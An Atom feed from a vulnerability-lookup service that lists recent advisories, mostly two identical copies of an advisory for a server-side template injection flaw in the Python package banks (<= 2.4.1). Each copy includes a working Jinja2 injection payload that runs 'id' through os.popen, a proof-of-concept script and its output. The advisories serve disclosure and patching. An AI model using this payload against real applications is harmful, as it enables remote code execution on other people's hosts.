<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-09T08:57:06.034303+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-340502</id>
    <title>EUVD-2026-340502</title>
    <updated>2026-10-09T08:57:06.106799+00:00</updated>
    <content>EUVD-2026-340502</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-340502"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-44209</id>
    <title>fkie_cve-2026-44209</title>
    <updated>2026-10-09T08:57:06.106840+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Banks generates meaningful LLM prompts using a template language that makes sense. Prior to 2.4.2, banks uses jinja2.Environment() (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to Prompt() are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system. This vulnerability is fixed in 2.4.2.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-44209"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-gphh-9q3h-jgpp</id>
    <title>GHSA-gphh-9q3h-jgpp — banks has Critical Remote Code Execution (RCE) via Jinja2 SSTI</title>
    <updated>2026-10-09T08:57:06.106876+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: banks</p>
<p>## Summary</p>
<p>`banks &lt;= 2.4.1` uses `jinja2.Environment()` (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to `Prompt()` are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system.</p>
<p>This is a vulnerability in how `banks` initializes its Jinja2 environment — not in Jinja2 itself.</p>
<p>## Vulnerable Code</p>
<p>`src/banks/env.py` — the global Jinja2 environment is created without sandboxing:</p>
<p>```python
env = Environment(
    autoescape=select_autoescape(enabled_extensions=("html", "xml"), default_for_string=False),
    ...
)
```</p>
<p>## Attack Scenario</p>
<p>An application that stores prompt templates in a database, accepts them via an API, or loads them from a user-supplied config file and passes them to `Prompt()` is vulnerable. For example:</p>
<p>```python
# User-controlled input reaches Prompt()
user_input = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(user_input)
p.text()  # Executes arbitrary command on the host
```</p>
<p>## Proof of Concept</p>
<p>**Setup:**
```bash
pip install banks==2.4.1
```</p>
<p>**PoC script:**
```python
from banks import Prompt</p>
<p>payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(payload)
result = p.text()
print(f"[+] Output: {result}")
```</p>
<p>**Confirmed output:**
```
[+] Output: uid=1000(ak) gid=1000(ak) groups=1000(ak),27(sudo),...</p>
<p>text</p>
<p>**File-write proof:**
```…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-gphh-9q3h-jgpp"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-2390</id>
    <title>PYSEC-2026-2390 — banks has Critical Remote Code Execution (RCE) via Jinja2 SSTI</title>
    <updated>2026-10-09T08:57:06.106933+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: banks</p>
<p>## Summary</p>
<p>`banks &lt;= 2.4.1` uses `jinja2.Environment()` (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to `Prompt()` are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system.</p>
<p>This is a vulnerability in how `banks` initializes its Jinja2 environment — not in Jinja2 itself.</p>
<p>## Vulnerable Code</p>
<p>`src/banks/env.py` — the global Jinja2 environment is created without sandboxing:</p>
<p>```python
env = Environment(
    autoescape=select_autoescape(enabled_extensions=("html", "xml"), default_for_string=False),
    ...
)
```</p>
<p>## Attack Scenario</p>
<p>An application that stores prompt templates in a database, accepts them via an API, or loads them from a user-supplied config file and passes them to `Prompt()` is vulnerable. For example:</p>
<p>```python
# User-controlled input reaches Prompt()
user_input = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(user_input)
p.text()  # Executes arbitrary command on the host
```</p>
<p>## Proof of Concept</p>
<p>**Setup:**
```bash
pip install banks==2.4.1
```</p>
<p>**PoC script:**
```python
from banks import Prompt</p>
<p>payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(payload)
result = p.text()
print(f"[+] Output: {result}")
```</p>
<p>**Confirmed output:**
```
[+] Output: uid=1000(ak) gid=1000(ak) groups=1000(ak),27(sudo),...</p>
<p>text</p>
<p>**File-write proof:**
```…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-2390"/>
  </entry>
</feed>
